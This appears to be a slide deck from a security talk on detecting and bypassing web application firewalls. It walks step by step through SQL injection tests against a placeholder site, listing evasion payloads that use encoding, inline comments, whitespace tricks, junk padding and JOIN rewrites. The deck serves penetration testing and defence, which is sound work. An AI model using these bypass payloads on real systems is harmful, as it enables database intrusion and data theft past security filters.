General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
2. Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India
Bug Hunter on Hackerone
CTF Author on Vulnhub.com
Some exploits and PoC on Exploit-db as well.
Passionate about Web Applications Security and Exploit Writing.
3. Agenda
Introduction to Web Applications Firewalls
Operation Modes
Vendors
Fingerprinting WAF
Ways to Bypass WAFs
Practical Cases for Bypassing
Conclusion
4. Introduction to Web Application Firewalls
Presents as Application Layer
Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers based
upon their pre-defined signatures in a database.
Basic goal of WAF is to monitor and block the contents that violates pre-defined policy.
These pre-defined policies are patterns of user input which ends up in potential attack.
Understands HTTP and HTTPs traffic better than any traditional firewall.
6. Negative Mode
A negative security model recognize attacks by relying on a database of expected attack signatures.
Example:
Do not allow in any page, any argument value (user input) which match potential XSS strings like
<script>,</script>, String.fromCharCode, etc.
Pros:
● Less time to implement.
Cons:
● Less protection.
7. Positive Model
A positive security model enforces positive behaviour by learning the application logic and the building a
security policy of valid known requests as a user interacts with the application.
Example:
Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until 65535.
Using intval conditions on page. (Accepts only integers)
Pros:
● Better performance (less rules).
● Less false positives.
Cons:
● Much more time to implement.
● Some vendors provide “automatic learning mode”, they help, but are far from perfect,
in the end, you always need a skilled human to review the policies
13. Fingerprinting WAF
On the basis of HTTP Response
Other WAF’s may be detected by the type of http response we receive when submitting a malicious
request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403,
406, 419, 500, 501 etc.
23. https://abc.com/index.php?id=1
Example 1 (Without WAF)
‘
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near '1 ' at line 6
Example 1 (With WAF)
https://abc.com/index.php?id=1 ‘
HTTP/1.1 403 Forbidden Error
Or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
Or
HTTP/1.1 500 Internal Server Error
Or
HTTP/1.1 400 Bad Request
24. Some recon on WAF
Came to know Modsecurity is in action
https://abc.com/index.php?id=1 “
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
right syntax to use near '1’ ' at line 6
This technique is URL Encoding
Some time you need to use:
1) Double URL Encoding :- %2527%27’
2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)
25. https://abc.com/index.php?id=1 %27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• ‘Order’ keyword is Blocked ??
• ‘Order by ’ keyword is Blocked ??
• Any other alternative of Order by query ??
• Does Spaces are blocked
Let’s Try
26. https://abc.com/index.php?id=1 %27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
• ‘Order’ keyword is Blocked
• Check again ‘order’ is blocked ??
https://abc.com/index.php?id=1 %27ORDER%23
HTTP/1.1 200 OK
New Assumptions in mind
• ‘Order’ keyword is not Blocked
• What is blocked then ???
SPACES ARE BLOCKED
27. https://abc.com/index.php?id=1 %27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1 %27ORDERby1 %23
HTTP/1.1 200 OK
No Assumptions in mind
Because spaces are blocked only
28. Techniques to bypass spaces
Using ‘+’ instead of space like:- order+by+1 (Mostly blocked)
Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1
Using combination of inline comments and URL encoding instead of spaces like:
• Order/%2a%2a/by/%2a%2a/1
• Order%2f**%2fby%2f**%2f1
Using combination of inline comments, URL encoding & Junk Characters instead of spaces like:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
29. Techniques to bypass spaces
Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01
Query will be
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
31. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• ‘Spaces’ were bypassed using inline comments..…Still
blocked???
• ‘UNION’ keyword is blocked ??
• ‘SELECT’ keyword is blocked ??
• ‘Intergers’ are blocked ??
• ‘Commas’ are blocked ?
• Combination of “UNION SELECT” is blocked
• “SELECT with Integers” are blocked
32. Techniques to Bypass
Using Inline comments:
/!*50000UNION*/
/*!40000UNION*/
/*!00000UNION*/
If UNION is blocked
Using URL Encoding Techniques:
%53nion
%2553nion
%55%4e%49%4f%4e (UNION)
Double URL Encoding
Triple URL Encoding
35. https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
• ‘UNION’ keyword is NOT blocked.
• ‘SELECT’ keyword is NOT blocked.
• ‘Intergers’ are NOT blocked
• ‘Commas’ are NOT blocked
• Combination of “UNION SELECT” is blocked ?
• “SELECT with Integers” are NOT blocked
36. Techniques to bypass combination of “union select”
Using combination of inline comments and URL encoding :
• /*!50000%55niOn*/ /*!50000%53eLECT*/
Using white spaces and URL encoding of comments (#)
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT
Using combination of inline comments and URL encoding :
• /*!50000%55niOn*/ /*!50000%53eLECT*/
37. Techniques to bypass combination of “union select”
Using Buffer Overflow
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Some time need to increase the junk as per the requirement
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX%0ASELECT
38. Techniques to bypass combination of “union select”
Using Distinct statement
UNION DISTINCT SELECT
Using Distinctrow statement
UNION DISTINCTROW SELECT
41. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• ‘UNION’ keyword is NOT blocked.
• ‘SELECT’ keyword is NOT blocked.
• ‘Intergers’ are NOT blocked
• ‘Commas’ are blocked
• Combination of “UNION SELECT” is NOT blocked ?
• “SELECT with Integers” are NOT blocked
Time to bypass commas “,”.
42. Basic Bypasses
URL Encoding - %2c ,
Double URL Encoding - %252c %2c ,
Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
43. Basic Bypasses
URL Encoding - %2c ,
Double URL Encoding - %252c %2c ,
Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
44. Advance way to bypass “Commas”
Using JOIN
JOIN used for columns as UNION is used for the rows
We have SELECT 1,2,3
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
45. Advance way to bypass “Commas”
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/J
OIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
46. Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI
DEMO TIME
47. References
Images in slides 10,11,14,15,16,17 Taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYB
ALOCH.pdf
Thank you..!
Editor's Notes
ISAPI Filters are the dlls which are used to enhance the functionality of IIS server. It is only available on IIS servers